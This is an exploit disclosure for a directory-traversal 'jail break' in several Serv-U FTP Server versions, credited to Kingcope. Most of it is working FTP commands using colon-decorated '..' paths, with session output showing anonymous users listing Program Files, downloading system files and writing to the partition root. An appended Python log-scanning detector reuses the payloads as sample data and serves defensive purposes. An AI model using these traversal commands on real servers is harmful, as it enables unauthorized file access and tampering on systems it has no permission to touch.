I'm better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

From the Vendor:
Fixed in Serv-U 11.1.0.5+. Affects all previous versions.

[*]----------------------------------------------------[*]

C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp        (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14  2011 Apache Software Foundation
drw-rw-rw- 1 user group 0 Feb  5  2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul  8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul  8 16:12 InstallShield Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul  8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12  2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul  8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12  2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb  5  2011 VMware
drw-rw-rw- 1 user group 0 Jul  8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb  5  2011 Windows NT
d--------- 1 user group 0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>

[*]----------------------------------------------------[*]

with write perms:

ftp> put foo.txt ..:/..:/..:/foobar        <<-- writes foo into root of partition

[*]----------------------------------------------------[*]

and as anonymous ftp:

ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s

[*]----------------------------------------------------[*]

This works too!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]

Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>
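
[*]----------------------------------------------------[*]

Detection example added here (not part of the original advisory and not vendor code): it scans FTP command logs for the colon-decorated dot-dot path segments ("..:" and ":..") that appear in the sessions above, while leaving a plain ".." alone. The log line layout, the sample lines and the function names are assumptions made for this example, not Serv-U's own log format.

```python
import re

# FTP commands whose argument is a path (the client's cd/ls/get/put map to these).
PATH_COMMANDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "APPE",
                 "DELE", "MKD", "RMD", "SIZE", "MDTM"}

# A ".." path segment with colons attached on either side, e.g. "..:" or ":..".
DECORATED_DOTDOT = re.compile(r":*\.\.:*")

# Constructed sample log: date, time, client IP, user, command, argument.
# This layout is an assumption for the example, not a real Serv-U log.
SAMPLE_LOG = """\
2011-11-12 21:50:01 192.0.2.10 anonymous CWD /..:/..:/..:/..:/program files
2011-11-12 21:50:07 192.0.2.10 anonymous RETR ..:/..:/..:/..:/windows/system32/calc.exe
2011-11-12 21:51:12 192.0.2.10 anonymous LIST -a ..:\\:..\\..:\\..:\\*
2011-11-12 21:52:30 198.51.100.7 alice CWD ../reports
2011-11-12 21:52:41 198.51.100.7 alice STOR notes..:txt
2011-11-12 21:53:02 198.51.100.7 alice RETR C:summary.txt
"""


def count_decorated_segments(argument):
    """Count path segments that are '..' with at least one adjacent colon."""
    # Split on both separators and on whitespace so "-a ..:" yields "..:".
    segments = re.split(r"[\\/\s]+", argument)
    return sum(1 for seg in segments
               if ":" in seg and DECORATED_DOTDOT.fullmatch(seg))


def find_jail_break_attempts(log_text):
    """Return (client, user, command, segment_count, argument) per suspicious line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # not a command line with an argument
        _date, _time, client, user, command, argument = fields
        if command.upper() not in PATH_COMMANDS:
            continue
        count = count_decorated_segments(argument)
        if count:
            hits.append((client, user, command.upper(), count, argument))
    return hits


if __name__ == "__main__":
    for client, user, command, count, argument in find_jail_break_attempts(SAMPLE_LOG):
        print(f"{client} {user} {command} x{count}: {argument}")
```

Any hit on a server older than the vendor's fixed release (11.1.0.5) is worth checking against the transfer log for files read or written outside the user's home directory.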